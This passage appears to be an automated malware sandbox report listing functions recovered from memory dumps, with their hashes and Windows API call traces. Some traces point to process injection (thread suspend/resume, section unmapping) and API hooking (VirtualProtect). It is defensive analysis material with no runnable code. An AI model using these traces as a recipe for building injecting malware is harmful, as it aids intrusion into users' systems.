    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
